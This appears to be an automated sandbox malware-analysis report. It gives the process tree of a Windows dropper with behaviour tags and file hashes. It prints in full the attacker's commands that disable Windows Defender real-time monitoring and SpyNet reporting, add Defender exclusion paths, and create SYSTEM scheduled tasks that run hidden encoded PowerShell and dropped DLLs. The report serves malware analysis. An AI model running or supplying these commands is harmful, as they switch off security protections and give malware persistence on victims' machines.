\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:1888
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:840 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:552 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:1600
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:1908
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gRWBNnyEr" /SC once /ST 07:01:23 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:2040
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gRWBNnyEr"4⤵PID:2044
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gRWBNnyEr"4⤵PID:576
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bnXhqWnZYPWvluXGbm" /SC once /ST 08:58:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\ahDQVohyzlKmkignS\RiDICJVdUnKYVhP\TZFbmXh.exe\" Rm /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:368
-
-
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {7F9E1EF8-2C71-4F3E-A8DB-4C17239054D5} S-1-5-21-4063495947-34355257-727531523-1000:RYNKSFQE\Admin:Interactive:[1]1⤵PID:520
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:872 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:556
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:296 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1060
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:368 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1568
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1760 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵PID:1568
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:728
-
C:\Windows\system32\taskeng.exetaskeng.exe {1FE7EC81-2A83-491C-9DD3-5B3554312378} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:932
-
C:\Users\Admin\AppData\Local\Temp\ahDQVohyzlKmkignS\RiDICJVdUnKYVhP\TZFbmXh.exeC:\Users\Admin\AppData\Local\Temp\ahDQVohyzlKmkignS\RiDICJVdUnKYVhP\TZFbmXh.exe Rm /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:1244 -
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "goeHeFbjC" /SC once /ST 03:11:03 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1104
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "goeHeFbjC"3⤵PID:1556
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "goeHeFbjC"3⤵PID:1744
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵PID:728
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
PID:1776
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵PID:1528
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
PID:772
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gLrFnqIbN" /SC once /ST 04:48:05 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:1112
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gLrFnqIbN"3⤵PID:576
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gLrFnqIbN"3⤵PID:296
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\kenPgsqBLemLniqf" /t REG_DWORD /d 0 /reg:323⤵PID:1736
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\kenPgsqBLemLniqf" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1896
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\kenPgsqBLemLniqf" /t REG_DWORD /d 0 /reg:643⤵PID:436
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\kenPgsqBLemLniqf" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:2044
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\kenPgsqBLemLniqf" /t REG_DWORD /d 0 /reg:323⤵PID:112
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\kenPgsqBLemLniqf" /t REG_DWORD /d 0 /reg:324⤵PID:952
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\kenPgsqBLemLniqf" /t REG_DWORD /d 0 /reg:643⤵PID:2020
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\kenPgsqBLemLniqf" /t REG_DWORD /d 0 /reg:644⤵PID:976
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\kenPgsqBLemLniqf\hXzFeHBE\xciAmoPYcVwfuSgk.wsf"3⤵PID:556
-
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\kenPgsqBLemLniqf\hXzFeHBE\xciAmoPYcVwfuSgk.wsf"3⤵
- Modifies data under HKEY_USERS
PID:1976 -
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KNfLkiMphNUn" /t REG_DWORD /d 0 /reg:644⤵PID:1900
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KNfLkiMphNUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1120
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NiCWuKvvKWJgC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1104
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NiCWuKvvKWJgC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:2004
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jMSgazFzqJtVbLJEjcR" /t REG_DWORD /d 0 /reg:324⤵PID:744
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jMSgazFzqJtVbLJEjcR" /t REG_DWORD /d 0 /reg:644⤵PID:1372
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kOgboOUMyeTU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1064
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kOgboOUMyeTU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1276
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ypnECPGzU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1028
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BBXtEIsMTiOzNlVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:900
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BBXtEIsMTiOzNlVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1604
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ypnECPGzU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1856
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ahDQVohyzlKmkignS" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1656
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ahDQVohyzlKmkignS" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1240
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\kenPgsqBLemLniqf" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1352
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\kenPgsqBLemLniqf" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:1144
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KNfLkiMphNUn" /t REG_DWORD /d 0 /reg:324⤵PID:1556
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KNfLkiMphNUn" /t REG_DWORD /d 0 /reg:644⤵PID:1160
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NiCWuKvvKWJgC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
PID:744
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jMSgazFzqJtVbLJEjcR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
PID:1372
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jMSgazFzqJtVbLJEjcR" /t REG_DWORD /d 0 /reg:644⤵PID:1404
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kOgboOUMyeTU2" /t REG_DWORD /d 0 /reg:324⤵PID:1272
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kOgboOUMyeTU2" /t REG_DWORD /d 0 /reg:644⤵PID:1896
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NiCWuKvvKWJgC" /t REG_DWORD /d 0 /reg:324⤵PID:1208
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ypnECPGzU" /t REG_DWORD /d 0 /reg:324⤵PID:1612
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ypnECPGzU" /t REG_DWORD /d 0 /reg:644⤵PID:1324
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BBXtEIsMTiOzNlVB" /t REG_DWORD /d 0 /reg:324⤵PID:1176
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ahDQVohyzlKmkignS" /t REG_DWORD /d 0 /reg:324⤵PID:1596
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\BBXtEIsMTiOzNlVB" /t REG_DWORD /d 0 /reg:644⤵PID:608
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ahDQVohyzlKmkignS" /t REG_DWORD /d 0 /reg:644⤵PID:1528
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\kenPgsqBLemLniqf" /t REG_DWORD /d 0 /reg:324⤵PID:1672
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\kenPgsqBLemLniqf" /t REG_DWORD /d 0 /reg:644⤵PID:1112
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gzUpIIKDo" /SC once /ST 02:05:44 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
PID:368
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gzUpIIKDo"3⤵PID:1904
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gzUpIIKDo"3⤵PID:1632
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵PID:1516
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵PID:1324
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵PID:1744
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵PID:1240
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "aMjmbceFMDnLRQrhL" /SC once /ST 00:06:16 /RU "SYSTEM" /TR "\"C:\Windows\Temp\kenPgsqBLemLniqf\ajeEcPIpsxTswcv\xEAtpTH.exe\" 1k /site_id 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:976
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "aMjmbceFMDnLRQrhL"3⤵PID:728
-
-
-
C:\Windows\Temp\kenPgsqBLemLniqf\ajeEcPIpsxTswcv\xEAtpTH.exeC:\Windows\Temp\kenPgsqBLemLniqf\ajeEcPIpsxTswcv\xEAtpTH.exe 1k /site_id 525403 /S2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:608 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bnXhqWnZYPWvluXGbm"3⤵PID:1624
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵PID:1164
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵PID:592
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵PID:2004
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵PID:1684
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ypnECPGzU\UPmcbH.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "YdTBLvROIXvKiKj" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:368
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "YdTBLvROIXvKiKj2" /F /xml "C:\Program Files (x86)\ypnECPGzU\ipABmKs.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1544
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "YdTBLvROIXvKiKj"3⤵PID:1272
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "YdTBLvROIXvKiKj"3⤵PID:1276
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "rEgzbydblMHcWW" /F /xml "C:\Program Files (x86)\kOgboOUMyeTU2\EyQojoa.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1956
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "nQJjoFuWxfxQm2" /F /xml "C:\ProgramData\BBXtEIsMTiOzNlVB\ezORZzR.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:320
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "pPslWquOCKHHKrjgV2" /F /xml "C:\Program Files (x86)\jMSgazFzqJtVbLJEjcR\DjNhQHe.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1324
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "yjDqposnDuTatUTvZEs2" /F /xml "C:\Program Files (x86)\NiCWuKvvKWJgC\pJHrhaU.xml" /RU "SYSTEM"3⤵
- Creates scheduled task(s)
PID:1240
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "BtdEAPXLHUGyDJnnI" /SC once /ST 04:24:49 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\kenPgsqBLemLniqf\SjwRehFz\rjtrVLj.dll\",#1 /site_id 525403" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:952
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "BtdEAPXLHUGyDJnnI"3⤵PID:1352
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:323⤵PID:1148
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:324⤵PID:1160
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:643⤵PID:276
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:644⤵PID:1372
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "aMjmbceFMDnLRQrhL"3⤵PID:1760
-
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\kenPgsqBLemLniqf\SjwRehFz\rjtrVLj.dll",#1 /site_id 5254032⤵PID:1100
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\kenPgsqBLemLniqf\SjwRehFz\rjtrVLj.dll",#1 /site_id 5254033⤵
- Blocklisted process makes network request
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
PID:772 -
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "BtdEAPXLHUGyDJnnI"4⤵PID:1924
-
-
-
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1628
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1160
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1542576271-1042584583-1012346753817845654-1230782214408985216202199815-1535310742"1⤵
- Windows security bypass
PID:1900
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:1272
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD57af756de0c74a3783e1c88b96645b9d9
SHA1deaf89192f8a62cc4811c589e90d0015c512c5e1
SHA256faaaddda1b1a0abdc0e73a75cf730dcf6b9adea79549a44944ff31020fe6f962
SHA512f8aea87a25a3f50b8187cea799080cefdb789161c4c25aedb186def783d1ae2cb10eaaf6cfcc392663528fecd423c45ce3f3ca6410e5b92c9a81f7321b94fad2
-
Filesize
2KB
MD5dc1f040efca7ac2f794937c7084d6418
SHA1b872c1275da3e938f33551511f368e429c116b56
SHA2567457a1deef94ef43c919e92d15df5f4c4a6ad8121da36b6a93fbbe8da4e5addf
SHA5121ebef7f9b40be8c5a217b273c111f0a82c74b839750643d7244003626a48ccf474f27acf85695212d5f45c252fae20eefc58882ed9f52389658859edc1c411a0
-
Filesize
2KB
MD57b783a51060a34ffbc3f18b50b6dced6
SHA192b81ccf9cb0ad759bcf5d88fceb344b4693629b
SHA256d192e5b5a9b4a32dc59f0157d996fc6754d2589099643cee6aa19583f3d06ffe
SHA51236bb0d04d87e0696aef5a54b549c2be0a797b6ee0caa3faa887a2da94959ca6085915d5fb84a70a294bb73966f0a2b0564bf9a6cfb687181ba5892f542a6442e
-
Filesize
2KB
MD57841bb210bb51dd414d31c652404827e
SHA1489e35eff7e43bad4b95677ad5a14a97a6905d8e
SHA2564aadb9cde90236a1e1067e3266f6aa1cdcf9c4d347c3ac9082473a40b9595eff
